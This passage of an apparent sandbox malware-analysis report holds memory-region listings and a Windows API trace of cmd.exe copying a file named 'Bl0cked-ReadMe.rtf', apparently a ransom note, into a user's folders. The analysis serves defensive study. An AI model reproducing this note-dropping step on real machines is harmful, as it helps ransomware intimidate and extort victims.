= "private_0x0000000000010000" filename = "" Region: id = 14537 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14538 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14539 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14540 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14541 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14542 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14543 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14544 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 14545 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15426 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15427 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15428 start_va = 0x50000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 15429 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15430 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 15431 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15432 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15433 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15434 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15435 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15436 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15437 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15438 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15439 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15440 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 15441 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15442 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15443 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 15444 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 15445 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 15446 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 15447 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 15448 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 15449 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 207 os_tid = 0x5e0 [0139.940] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fa84 | out: lpSystemTimeAsFileTime=0x18fa84*(dwLowDateTime=0x8d572400, dwHighDateTime=0x1d440a9)) [0139.941] GetCurrentProcessId () returned 0xd3c [0139.941] GetCurrentThreadId () returned 0x5e0 [0139.941] GetTickCount () returned 0x2bf87 [0139.941] QueryPerformanceCounter (in: lpPerformanceCount=0x18fa7c | out: lpPerformanceCount=0x18fa7c*=19672983160) returned 1 [0139.941] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0139.941] __set_app_type (_Type=0x1) [0139.941] __p__fmode () returned 0x76b331f4 [0139.942] __p__commode () returned 0x76b331fc [0139.942] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0139.942] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0139.942] GetCurrentThreadId () returned 0x5e0 [0139.942] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5e0) returned 0x38 [0139.942] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.942] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0139.942] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.942] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.942] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fa14 | out: phkResult=0x18fa14*=0x0) returned 0x2 [0139.943] VirtualQuery (in: lpAddress=0x18fa4b, lpBuffer=0x18f9e4, dwLength=0x1c | out: lpBuffer=0x18f9e4*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.943] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f9e4, dwLength=0x1c | out: lpBuffer=0x18f9e4*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.943] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f9e4, dwLength=0x1c | out: lpBuffer=0x18f9e4*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.943] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f9e4, dwLength=0x1c | out: lpBuffer=0x18f9e4*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.943] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f9e4, dwLength=0x1c | out: lpBuffer=0x18f9e4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0139.943] GetConsoleOutputCP () returned 0x1b5 [0139.943] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.943] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0139.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.943] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0139.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.943] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.944] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.944] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.944] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.944] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.944] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0139.944] GetEnvironmentStringsW () returned 0x2801b8* [0139.945] FreeEnvironmentStringsW (penv=0x2801b8) returned 1 [0139.945] GetEnvironmentStringsW () returned 0x2801b8* [0139.945] FreeEnvironmentStringsW (penv=0x2801b8) returned 1 [0139.945] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e984 | out: phkResult=0x18e984*=0x40) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x0, lpData=0x18e990*=0xf0, lpcbData=0x18e988*=0x1000) returned 0x2 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x1, lpcbData=0x18e988*=0x4) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x0, lpData=0x18e990*=0x1, lpcbData=0x18e988*=0x1000) returned 0x2 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x0, lpcbData=0x18e988*=0x4) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x40, lpcbData=0x18e988*=0x4) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x40, lpcbData=0x18e988*=0x4) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x0, lpData=0x18e990*=0x40, lpcbData=0x18e988*=0x1000) returned 0x2 [0139.945] RegCloseKey (hKey=0x40) returned 0x0 [0139.945] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e984 | out: phkResult=0x18e984*=0x40) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x0, lpData=0x18e990*=0x40, lpcbData=0x18e988*=0x1000) returned 0x2 [0139.946] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x1, lpcbData=0x18e988*=0x4) returned 0x0 [0139.946] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x0, lpData=0x18e990*=0x1, lpcbData=0x18e988*=0x1000) returned 0x2 [0139.946] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x0, lpcbData=0x18e988*=0x4) returned 0x0 [0139.946] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x9, lpcbData=0x18e988*=0x4) returned 0x0 [0139.946] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x9, lpcbData=0x18e988*=0x4) returned 0x0 [0139.946] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x0, lpData=0x18e990*=0x9, lpcbData=0x18e988*=0x1000) returned 0x2 [0139.946] RegCloseKey (hKey=0x40) returned 0x0 [0139.946] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0139.946] srand (_Seed=0x5b88636e) [0139.946] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0139.946] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0139.946] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.946] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281918, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0139.947] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0139.947] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.947] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.947] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.947] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.947] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.947] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.947] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.947] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.947] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.947] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.947] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.947] GetEnvironmentStringsW () returned 0x282308* [0139.947] FreeEnvironmentStringsW (penv=0x282308) returned 1 [0139.947] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.947] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.947] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.948] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.948] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.948] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.948] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.948] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.948] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.948] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.948] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f750 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.948] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f750, lpFilePart=0x18f74c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f74c*="Desktop") returned 0x18 [0139.948] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.948] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f4cc | out: lpFindFileData=0x18f4cc) returned 0x280048 [0139.948] FindClose (in: hFindFile=0x280048 | out: hFindFile=0x280048) returned 1 [0139.948] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f4cc | out: lpFindFileData=0x18f4cc) returned 0x280048 [0139.949] FindClose (in: hFindFile=0x280048 | out: hFindFile=0x280048) returned 1 [0139.949] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f4cc | out: lpFindFileData=0x18f4cc) returned 0x280048 [0139.949] FindClose (in: hFindFile=0x280048 | out: hFindFile=0x280048) returned 1 [0139.949] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.949] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0139.949] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0139.949] GetEnvironmentStringsW () returned 0x282b28* [0139.949] FreeEnvironmentStringsW (penv=0x282b28) returned 1 [0139.949] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.950] GetConsoleOutputCP () returned 0x1b5 [0139.950] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.950] GetUserDefaultLCID () returned 0x409 [0139.950] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f890, cchData=128 | out: lpLCData="0") returned 2 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f890, cchData=128 | out: lpLCData="0") returned 2 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f890, cchData=128 | out: lpLCData="1") returned 2 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0139.951] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.952] GetConsoleTitleW (in: lpConsoleTitle=0x270908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.952] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.953] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0139.953] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0139.953] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0139.954] _wcsicmp (_String1="type", _String2=")") returned 75 [0139.954] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0139.954] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0139.954] _wcsicmp (_String1="IF", _String2="type") returned -11 [0139.954] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0139.954] _wcsicmp (_String1="REM", _String2="type") returned -2 [0139.954] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.731] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.731] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.731] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.731] GetFileType (hFile=0x7) returned 0x2 [0140.731] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.731] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f788 | out: lpMode=0x18f788) returned 1 [0140.731] _dup (_FileHandle=1) returned 3 [0140.732] _close (_FileHandle=1) returned 0 [0140.732] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0140.732] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18f758, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0140.732] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0140.732] GetConsoleTitleW (in: lpConsoleTitle=0x18f588, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.732] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0140.732] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0140.732] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0140.733] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0140.733] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.733] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x18f0ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f0ec) returned 0x270eb8 [0140.734] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0140.734] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0140.734] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0140.734] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18dff8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0140.734] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0140.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.734] GetFileType (hFile=0x54) returned 0x1 [0140.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.734] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18e050 | out: lpFileSizeHigh=0x18e050*=0x0) returned 0x1632 [0140.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.734] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.734] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.735] GetFileType (hFile=0x4c) returned 0x1 [0140.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.735] GetFileType (hFile=0x4c) returned 0x1 [0140.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.735] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.736] GetFileType (hFile=0x4c) returned 0x1 [0140.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.736] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.736] GetFileType (hFile=0x4c) returned 0x1 [0140.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.736] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: 